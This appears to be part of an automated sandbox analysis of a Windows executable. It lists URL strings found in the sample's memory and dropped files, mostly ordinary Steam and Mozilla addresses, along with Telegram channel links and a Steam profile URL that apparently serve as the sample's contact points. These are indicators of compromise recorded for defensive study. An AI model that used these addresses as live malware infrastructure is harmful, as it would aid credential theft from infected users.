Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&l=engl
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_global.js?v=7glT1n_nkVCs&l=eng
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunf
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: CFCFHJ.2.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: https://mozilla.org0/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199786602107
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107$
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/badges
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/inventory/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611997866021077
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107H
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampo
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: DHCBGD.2.dr	String found in binary or memory: https://support.mozilla.org
Source: DHCBGD.2.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DHCBGD.2.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/JDc
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/fun88rockskek
Source: 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/fun88rockskekHn
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/fun88rockskekcarrghttps://steamcommunity.com/profiles/76561199786602107g0b4csql.dllsqlp
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/fun88rockskeki
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/lpnjoke
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
Source: 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
